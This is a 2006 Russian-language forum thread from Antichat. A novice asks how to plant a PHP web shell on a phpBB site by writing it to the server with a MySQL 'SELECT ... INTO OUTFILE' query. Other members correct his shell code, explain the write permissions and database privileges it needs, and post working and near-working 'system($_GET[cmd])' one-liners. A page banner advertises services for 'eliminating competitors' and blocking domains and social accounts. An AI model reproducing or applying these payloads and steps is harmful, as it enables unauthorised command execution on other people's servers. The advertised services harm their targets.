Форум АНТИЧАТ - Заливка шелла через БД

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Форумы
Заливка шелла через БД

Опции темы

Поиск в этой теме

Опции просмотра

Заливка шелла через БД

01.07.2006, 15:03

Tosic

Новичок

Регистрация: 11.04.2006

Сообщений: 9

Провел на форуме:
7195

Репутация: -2

Заливка шелла через БД

подскажите пожалуйста как правильно выкачать шелл из БД в файл на сервере, мои попытки не увенчались успехом, так как при выборке в файл чего-то символы заменяются их кодом
вот пример как я вытаскивал шелл
SELECT cat_title INTO OUTFILE 'раскрытый путь/phpbb/cache/shell.php' FROM phpbb_categories where cat_id=1; - это пример
как лучше оформить запрос или что нужно вписать в БД
текст шелла: <?p system("$_GET[cmd]"); ?>

03.07.2006, 00:36

1ten0.0net1

Time out

Регистрация: 28.11.2005

Сообщений: 547

Провел на форуме:
2320925

Репутация: 1348

1) Проверь - разрешена ли запись в папку cache;
2) Шелл - не <?p... , а <?php...;
3) Кавычками обрамлять надо cmd, а не весь текст в скобках (да и то невсегда).

03.07.2006, 07:00

banall

Познающий

Регистрация: 25.06.2006

Сообщений: 55

Провел на форуме:
79099

Репутация: 0

Цитата:

Сообщение от 1ten0.0net1

Нифига не получиться форум в сафе режиме можно только через фтп или ищи открытую папку можно не на форуме. Т.к. весь форум закрыт на запись.

03.07.2006, 13:02

~~ZaCo~~

Banned

Регистрация: 20.06.2005

Сообщений: 880

Провел на форуме:
4610226

Репутация: 1332

>>Нифига не получиться форум в сафе режиме
никакой связи между сафе модом в пхп и мускл сервером нет. запросы отсылаются? - отсылаюстся. стало быть достаточно чтобы текущий юзер мускул сервера обльадал необходимыми привилегиями - о них уже писали, и не только на форуме.

03.07.2006, 21:59

Dw@d

Новичок

Регистрация: 22.01.2006

Сообщений: 23

Провел на форуме:
2007673

Репутация: 9

Цитата:

<?p system("$_GET[cmd]"); ?>

лол )))))) такой код никогда и не заработает

03.07.2006, 22:42

Zadoxlik

Постоянный

Регистрация: 28.02.2005

Сообщений: 853

Провел на форуме:
3369632

Репутация: 749

Как я понял, там стоит phpBB. Тоды тебе сюда:
1
2

04.07.2006, 08:53

Tosic

Новичок

Регистрация: 11.04.2006

Сообщений: 9

Провел на форуме:
7195

Репутация: -2

спасибо, что указали на ошибки, так как я недавно практикую с хакингом, просто ради интереса.
как я понял код должен быть таким:
<?php system($_GET["cmd"]); ?>
правильно?

04.07.2006, 09:42

Nova

OpenVPN.CC

Регистрация: 15.07.2005

Сообщений: 1,599

Провел на форуме:
7670961

Репутация: 1034

Отправить сообщение для Nova с помощью ICQ

Лол млин учись нормально код делать

или так

Код:

<? system(GET['cmd']); ?>

или так

Код:

<?php system(GET['cmd']); ?>

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Заливка шелла Ipb 2.1.6	banall	Форумы	9	01.11.2006 14:12
Заливка шелла в phpBB 2.0.9 через SQL	bandera	Форумы	13	06.06.2006 19:19
Способы загрузки шелла через картнику	1ten0.0net1	Форумы	16	27.03.2006 14:02
Заливка шелла на phpBB 2.0.6 через highlights	ded2006	Форумы	22	12.01.2006 07:29
Заливка шелла и снятие бана в ipb через mysql	darks	Форумы	14	26.11.2005 00:03

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход